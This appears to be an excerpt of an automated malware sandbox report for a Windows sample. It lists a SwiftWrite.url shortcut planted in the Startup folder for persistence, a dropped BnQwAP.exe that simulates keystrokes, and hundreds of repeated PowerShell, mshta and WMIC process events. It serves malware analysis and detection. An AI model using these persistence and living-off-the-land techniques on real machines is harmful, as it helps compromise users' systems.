Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656004514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,16_2_00007FF656004514
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
